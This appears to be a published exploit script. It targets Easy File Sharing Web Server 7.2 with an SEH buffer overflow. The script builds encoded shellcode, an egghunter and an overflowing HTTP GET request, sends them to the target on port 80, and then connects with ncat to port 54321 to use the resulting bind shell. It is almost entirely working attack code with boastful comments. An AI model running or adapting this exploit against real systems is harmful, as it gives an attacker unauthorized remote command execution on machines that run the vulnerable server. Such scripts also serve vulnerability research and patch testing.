#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 SEH Overflow with Egghunter
# Date: July 29, 2016
# Exploit Author: ch3rn0byl
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/download.php
# Version: 7.2
# Tested on: Windows 7, 8, 8.1, 10
# Admin privileges anyone?? hehe ;)

from socket import socket, AF_INET, SOCK_STREAM
from sys import argv
from struct import pack
from time import sleep
from subprocess import call

host = argv[1]

rekt =  ""
rekt += "\x93\x93\x48\xf5\x93\x93\x90\xf9\x90\x37\x4a\x48\x90"
rekt += "\x99\x9b\x37\x98\x9f\xfc\xd6\xbd\x71\xab\x9a\xbc\xdb"
rekt += "\xd0\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x53\x31\x6f\x12"
rekt += "\x83\xef\xfc\x03\x1e\xa5\x78\x49\x1c\x51\xfe\xb2\xdc"
rekt += "\xa2\x9f\x3b\x39\x93\x9f\x58\x4a\x84\x2f\x2a\x1e\x29"
rekt += "\xdb\x7e\x8a\xba\xa9\x56\xbd\x0b\x07\x81\xf0\x8c\x34"
rekt += "\xf1\x93\x0e\x47\x26\x73\x2e\x88\x3b\x72\x77\xf5\xb6"
rekt += "\x26\x20\x71\x64\xd6\x45\xcf\xb5\x5d\x15\xc1\xbd\x82"
rekt += "\xee\xe0\xec\x15\x64\xbb\x2e\x94\xa9\xb7\x66\x8e\xae"
rekt += "\xf2\x31\x25\x04\x88\xc3\xef\x54\x71\x6f\xce\x58\x80"
rekt += "\x71\x17\x5e\x7b\x04\x61\x9c\x06\x1f\xb6\xde\xdc\xaa"
rekt += "\x2c\x78\x96\x0d\x88\x78\x7b\xcb\x5b\x76\x30\x9f\x03"
rekt += "\x9b\xc7\x4c\x38\xa7\x4c\x73\xee\x21\x16\x50\x2a\x69"
rekt += "\xcc\xf9\x6b\xd7\xa3\x06\x6b\xb8\x1c\xa3\xe0\x55\x48"
rekt += "\xde\xab\x31\xbd\xd3\x53\xc2\xa9\x64\x20\xf0\x76\xdf"
rekt += "\xae\xb8\xff\xf9\x29\xbe\xd5\xbe\xa5\x41\xd6\xbe\xec"
rekt += "\x85\x82\xee\x86\x2c\xab\x64\x56\xd0\x7e\x10\x5e\x77"
rekt += "\xd1\x07\xa3\xc7\x81\x87\x0b\xa0\xcb\x07\x74\xd0\xf3"
rekt += "\xcd\x1d\x79\x0e\xee\xf5\x4b\x87\x08\x9f\xbb\xc1\x83"
rekt += "\x37\x7e\x36\x1c\xa0\x81\x1c\x34\x46\xc9\x76\x83\x69"
rekt += "\xca\x5c\xa3\xfd\x41\xb3\x77\x1c\x56\x9e\xdf\x49\xc1"
rekt += "\x54\x8e\x38\x73\x68\x9b\xaa\x10\xfb\x40\x2a\x5e\xe0"
rekt += "\xde\x7d\x37\xd6\x16\xeb\xa5\x41\x81\x09\x34\x17\xea"
rekt += "\x89\xe3\xe4\xf5\x10\x61\x50\xd2\x02\xbf\x59\x5e\x76"
rekt += "\x6f\x0c\x08\x20\xc9\xe6\xfa\x9a\x83\x55\x55\x4a\x55"
rekt += "\x96\x66\x0c\x5a\xf3\x10\xf0\xeb\xaa\x64\x0f\xc3\x3a"
rekt += "\x61\x68\x39\xdb\x8e\xa3\xf9\xeb\xc4\xe9\xa8\x63\x81"
rekt += "\x78\xe9\xe9\x32\x57\x2e\x14\xb1\x5d\xcf\xe3\xa9\x14"
rekt += "\xca\xa8\x6d\xc5\xa6\xa1\x1b\xe9\x15\xc1\x09"

# Our tag is hive: \x68\x69\x76\x65

egghunter = ''
egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c'
egghunter += '\x05\x5a\x74\xef\xb8\x68\x69\x76\x65\x8b\xfa\xaf\x75'
egghunter += '\xea\xaf\x75\xe7\xff\xe7'

crash = "A" * 4061
crash += pack('<L', 0x909006eb)
crash += pack('<L', 0x10019ce3)
crash += egghunter
crash += "D" * (5500 - 4061 - 8 - len(egghunter))

payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)
payload += 'hivehive'
payload += rekt
payload += 'E' * (800 - len(rekt))

print '[+] Trying to exploit {}...'.format(host)

try:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, 80))
        print '[+] Sending payload...'
        s.send(payload)
        s.close()
        print '[+] Trying to connect to target...\n'
        try:
                sleep(2)
                call(['ncat', host, '54321'])
        except:
                print '[!] Whoops!! Something went wrong?'
except:
        print '[!] Whoops!! Something went wrong?'
finally:
        print '\n[+] I <3 SHELLS'